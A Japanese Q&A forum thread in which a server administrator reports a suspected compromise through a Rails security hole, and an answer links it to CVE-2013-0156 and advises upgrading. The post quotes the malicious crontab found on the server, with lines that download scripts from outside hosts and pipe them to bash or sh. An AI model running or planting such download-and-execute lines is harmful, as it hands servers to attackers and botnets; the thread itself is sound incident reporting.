QA@IT

Railsがクラッキングされている?

4719 PV

正確には、「Railsのセキリティーホールを使って、サーバがクラッキングされている」かもしれません。

現在、Rails3.2.3、Ubuntu 10.04.4 LTSを使っているのですが、Railsのセキリティーホールをついて、サーバがクラッキングされている可能性があり、詳細な情報を知りたく質問させていただきました。

詳細を書かせていただきます。

あるサーバで、Crontabによって毎日実行していたプログラムがあったのですが、「2013-05-23」移行の日付を境に、プログラムが実行されていないことに気がつきました。
そこでサーバにログインして、crontab -lを実行してみると、以下の結果が出力されました。

1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget  -O - ddos.cat.com/cmd3|bash;
0 * * * * wget -O - medobra.ru/cmdr | sh - 2>/dev/null 1>/dev/null

どうも既存のCrontabを上書きしてこの設定が書き込まれていたため、プログラムが実行されていないようでした。
そこでこのcolkolduld.comを元に検索を掛けてみたところ、不信な記事があがりました。
Critical Ruby on Rails bug exploited in wild, hacked servers join botnet

「Railsのセキリティーホールをついて、サーバをIRCのBOTにする」というような内容の記事だと思うのですが、恥ずかしながら私の英語力では詳細までつかみきれていません。

どなたかこの件の詳細をご存じないでしょうか?

回答

CVE-2013-0156
ですかね。

http://security.intellilink.co.jp/article/vulner/130124.html

http://jvndb.jvn.jp/ja/contents/2013/JVNDB-2013-001019.html

3.2.11で修正されてるようですけど、5/30というのが気になりますね
(元々は1月頃の報告みたいですし、3.2.11もその頃には出てたみたいですし)

3.2.11でググると結構引っかかるので参考にアップデートされると良いかと思います

編集 履歴 (1)
  • いつもお返事ありがとうございます。
    推測ではありますが、自分のサイトを狙い撃ちにしたクラッキングではないようですし、緊急を要する事態ではなかったようです。とりあえず、このCronを消して、Rails3.2.14までバージョンをあげる事で対応しようと思います。
    ありがとうございました。
    -
ウォッチ

この質問への回答やコメントをメールでお知らせします。